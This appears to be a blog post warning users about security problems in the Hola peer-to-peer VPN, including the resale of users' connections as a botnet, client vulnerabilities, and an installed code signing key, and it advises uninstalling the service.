The Hola peer to peer VPN service suffered a number of very damaging security revelations today. Hola claims that there are (or were) about 45 million active users of the service.
The first problem is that Hola sells a service called Luminati which allows anyone to pay to use all the other users’ computers like a giant botnet. It looks like the website 8chan was recently attacked using this capability. Researchers have demonstrated that Hola does not screen the people to whom it sells this service, nor do they monitor or enforce any kind of terms of service. To me this is recklessly irresponsible behavior.
In addition researchers found a number of major vulnerabilities in the Hola client (some of which have now been fixed). Vulnerabilities allowed attackers to exploit the client and take full control of the user’s computer. There was also a console which would allow attackers to download software, move files on the user’s computer, and more. This is basically an open back door to take over the machine.
Worst of all is that Hola installed its own code signing key into the windows operating system. Any software signed by that key would be treated as completely legitimate by the computer. This is a gigantic failure in security architecture. Either they did not know what they were doing (which is not at all good), or they did (which is even worse).
Finally, the basic peer to peer nature of Hola inherently puts their users at risk. By design your web traffic goes out through some other user’s computer, and someone’s traffic is exiting through yours. So let’s look at each of those situations.
Your traffic it going out through some random person’s computer. That person has the ability to capture all your web traffic, monitor your activities, and insert trackers and malware. This is similar to the problem with Tor nodes, but here there are even fewer checks and balances, and much less barrier to entry.
If someone is doing something bad on the web, like publishing child pornography, it could appear to be coming from your internet connection. While you might be able to prove that you were not the source, you might get roughed up by the SWAT team and spend a few months in jail first.
The only safe course of action is to completely un-install Hola immediately (instructions HERE).
This shows once again the importance of selecting a privacy service provider based on reputation and track record. The operators of the service should be known and public. The service must have a track record of strong security, product design, and proven record of resisting attacks and legal pressures.
You might be interested in these other related blog posts: